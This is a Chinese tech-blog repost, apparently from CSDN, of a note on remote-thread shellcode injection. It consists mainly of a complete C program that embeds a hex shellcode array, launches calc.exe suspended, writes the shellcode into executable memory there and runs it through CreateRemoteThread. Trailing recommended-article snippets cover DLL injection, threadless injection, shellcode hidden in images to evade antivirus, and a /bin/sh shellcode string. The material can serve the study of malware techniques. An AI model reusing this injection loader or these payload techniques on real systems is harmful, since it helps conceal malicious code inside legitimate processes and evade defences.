远程线程注入shellcode笔记

最新推荐文章于 2023-09-19 16:04:04 发布
最新推荐文章于 2023-09-19 16:04:04 发布
阅读量317 收藏 1
点赞数
原文链接:http://www.cnblogs.com/killbit/p/5971446.html
版权

 

 

#include "stdafx.h"
#include <windows.h>
#include <stdio.h>

char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
		"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
		"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
		"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
		"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
		"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
		"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
		"\x49\x0b\x31\xc0\x51\x50\xff\xd7";


BOOL injection()
{
	wchar_t Cappname[MAX_PATH] = {0};
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	LPVOID lpMalwareBaseAddr;
	LPVOID lpnewVictimBaseAddr;
	HANDLE hThread;
	DWORD dwExitCode;
	BOOL bRet = FALSE;

	lpMalwareBaseAddr = shellcode;

	//获取计算器的地址,接下来将启动一个计算器
	GetSystemDirectory(Cappname,MAX_PATH);
	_tcscat(Cappname,L"\\calc.exe");
	printf("Injection program Name:%S\r\n",Cappname);

	ZeroMemory(&si,sizeof(si));
	si.cb = sizeof(si);
	ZeroMemory(&pi,sizeof(pi));

	//创建计算器
	if (CreateProcess(Cappname,NULL,NULL,NULL,
		FALSE,CREATE_SUSPENDED
		,NULL,NULL,&si,&pi) == 0)
	{
		return bRet;
	}

	//开辟内存空间大小
	lpnewVictimBaseAddr = VirtualAllocEx(pi.hProcess
		,NULL,sizeof(shellcode)+1,MEM_COMMIT|MEM_RESERVE,
		PAGE_EXECUTE_READWRITE);

	if (lpnewVictimBaseAddr == NULL)
	{
		return bRet;
	}

	//将SHELLCODE写入
	WriteProcessMemory(pi.hProcess,lpnewVictimBaseAddr,
		(LPVOID)lpMalwareBaseAddr,sizeof(shellcode)+1,NULL);

	//创建线程
	hThread = CreateRemoteThread(pi.hProcess,0,0,
		(LPTHREAD_START_ROUTINE)lpnewVictimBaseAddr,NULL,0,NULL);

	//等待结束进程
	WaitForSingleObject(pi.hThread,INFINITE);
	GetExitCodeProcess(pi.hProcess,&dwExitCode);
	TerminateProcess(pi.hProcess,0);
	return bRet;
}

void help(char* proc)
{
	printf("%s:[-] start a process and injection shellcode to memory\r\n",proc);
}

int main(int argc,char* argv[])
{
	help(argv[0]);
	injection();
}

 

 

转载于:https://www.cnblogs.com/killbit/p/5971446.html

weixin_30872789
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
远程线程shellcode注入
ndl1302732的专栏
10-11 2251
高手请飘过~~~~~~~~~~~~~~~~~~~~~~~~~~~          前一篇文章,写到了利用远程线程注入DLL,其原理是利用LoadLibaray把DLL加载进去,这种方式注入简单,但是会在对方进程加载一个模块。人家用工具一看,多了个模块,就知道被搞了。。。           今天写下用远程线程注入shellcode, 注入shellcode的难点是,注入的代码不能访问绝对地址...
ShellCode的另外一种玩法(远程线程注入ShellCode)[by Anskya]
04-06 2213
 [原创]ShellCode的另外一种玩法(远程线程注入ShellCode)介于小弟技术菜,请各位大哥不要"奸笑"希望可以指点一二转载请保留版权:by Anskya这里是说将ShellCode代码直接注射到远程进程内部使她运行!以下代码全部使用TASM为原型编写(MASM不太适合,不能自定义PE结构,为了某某人说我抄袭和盗版pkXX大哥的FASM大作,我这里就使用国内很少用的TASM为原型
ShellCode编写和远程代码注入
&Ψ的博客
09-15 1295
文章目录1.ShellCode是什么2.ShellCode的编写原则3.TEB与PEB1)TEB线程信息获取当前线程的TEB2)PEB进程环境块获取当前进程的TEBPEB_LDR_DATALDR_DATA_TABLE_ENTRY在任意进程中找到一个LDR_DATA_TABLE_ENTRY1.一些结构体的定义2.寻找方法4.ShellCode的实现思路5.远程注入代码6.关于我在vs2017编写时遇到的问题解决方法 1.ShellCode是什么 一段特殊的代码,不依赖与任何进程环境。简单来讲就是一段可以在Wi
ShellCode —— 无线程注入
LYSM
07-26 744
背景 也叫进程内存替换,就是指将一个进程的内存数据清空,写入任意我们想写入的数据,并更改执行顺序,执行我们写入的数据代码。 简单过程就是: 创建一个挂起主线程的进程(也可以直接挂起目标进程,不自己创建) 在新进程的地址空间内申请一块内存,写入我们的 Shellcode 更改新进程执行顺序,执行我们的 Shellcode 代码 函数介绍 // 获取线程上下文 BOOL WINAPI GetThreadContext( _In_ HANDLE hThread,
20145327《网络对抗》——注入shellcode并执行和Return-to-libc攻击深入
dengnaxun1606的博客
03-12 324
20145327《网络对抗》——注入shellcode并执行 准备一段Shellcode 老师的shellcode:\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00 设置堆栈可执行 关闭地...
易语言远程线程注入方法
01-04
易语言远程线程注入方法是一种在程序运行时将一段代码注入到另一个正在运行的进程中的技术。这种方法在软件开发、调试、性能优化以及恶意软件中都有应用。在易语言中,实现远程线程注入需要对操作系统底层机制和...
远程线程注入工具,可生成代码 可自定义shellcode注入进程-易语言
06-14
双击第三个输入框即可生成shellcode,这里默认的shellcode远程线程注入 注入的是当前程序选择注入的进程 这里选择最左下角的选项,然后再双击输入框 即可生成在自身程序执行的shellcode 这里说明一下哈,这里是...
windows-CODE注入远程线程注入
08-14
3. **Shellcode注入**:直接将机器码写入目标进程,执行特定操作。 四、安全与防范 远程线程注入虽然有其合法用途,但也常被滥用在恶意软件中。因此,操作系统和安全软件都对此进行了防范: - **DEP(Data ...
利用图片隐写术来远程动态加载shellcode1
08-03
本篇文章主要探讨如何利用这种技术将shellcode隐藏在BMP图片中,从而实现远程动态加载,增加隐蔽性和免杀性。Shellcode是攻击者常用的代码片段,通常用于绕过系统安全机制执行特定操作。 首先,我们要了解BMP文件的...
内核线程注入x64
11-22
内核线程注入是一种高级的系统编程技术,主要用于在操作系统内核层面对进程进行操作,例如注入DLL(动态链接库)或执行特定的ShellCode。本文将深入探讨在64位Windows 7环境下,如何利用驱动程序实现内核线程注入。 ...
InjectCode:远程线程注入DLL库,支持windows 32位和64位平台
06-26
注入代码 InjectCode 项目是一个支持 Windows 32 位和 64 位 DLL 远程线程注入库。 测试平台 视窗 8 x64 视窗 8 x32 视窗 7 SP1 x64 视窗 7 SP1 x32 视窗 2008 R2 视窗 2003 SP2 x64 视窗 2003 SP2 x32 Windows XP SP2 x64 Windows XP SP2 x32 工作原理 步骤 1. 通过进程名称查找目标进程。 step 2. 查找先后注入的进程。 setp 3.判断程序是否可以注入中位数。 setp 4. 创建一个远程线程注入到目标进程的dll。
远程线程注入的例子(最近学习资料)
07-12
最近学习了几个远程线程注入的程序的编写,整理了一下,上传共学习交流。这个只是其中之一,其他见我的资源列表(关于线程注入和进程隐藏的例子都已经上传)。
shellcode执行盒_简单shellcode学习
weixin_39887183的博客
12-06 327
引言之前遇到没开启NX保护的时候,都是直接用pwtools库里的shellcode一把梭,也不太懂shellcode代码具体做了些什么,遇到了几道不能一把梭的题目,简单学习一下shellcode的编写。前置知识NX(堆栈不可执行)保护shellcode(一段16进制的数据,转化为字符串则为汇编代码)pwnable之start保护检测可以看到这道题目什么保护都没有开ida分析题目只有sta...
笔记ShellCode 远程线程注入
最新发布
喜欢唱,rap,篮球的程序员
09-19 479
什么是进程,什么是线程进程就是4GB的空间,线程就是EIP。
一文读懂远程线程注入
Karka_的博客
09-11 359
在红队行动中,红队的目的都是要在不暴露自身行动的前提下,向蓝队发动攻击。他们使用各种技术和程序来隐藏C2连接和数据流。攻击活动的第一步是获得初始访问权。他们会使用定制的恶意软件和有效载荷来躲避防杀软和EDR等防御工具。本文涉及知识点实操练习:[DLL注入型病毒实验](https://www.hetianlab.com/expc.do?wemedia)(通过实验了解DLL注入型病毒的攻击过程)进程注入是用来逃避防御机制的重要技术之一。
C++进程注入
热门推荐
神棍之路
08-25 7万+
// C++Injector.cpp : 定义控制台应用程序的入口点。 // #include "stdafx.h" #include #include char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c
java远程线程注入_学习:远程线程实现DLL注入shellcode注入以及OD调试原理
weixin_36286567的博客
02-17 521
远程线程:#include#include//函数地址:00C31740int main() {HANDLE hThread;HANDLE hProcess;// 1、得到要在其进程中创建线程的进程句柄hProcess = OpenProcess(PROCESS_ALL_ACCESS,false,10940);if (hProcess == NULL) {OutputDebugString("Op...
利用注入进程shellcode实现程序自删除
bulerain的专栏
06-06 3051
某些情况下需要exe运行结束删除自身,而自删除程序有好几种方法,如下面的两方法:a.先使自己快速退出,然后再在命令行中删除自己;或是先使自己快速退出,然后再在bat文件或脚本文件中删除自己b. 非常经典的,关闭硬编码为4的句柄,撤销自己在内存的映射,再删除自己,再结束自己,也就是进程在未真正退出的时候就已经被删除了(只能在win2k或98使用)                    int mai
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值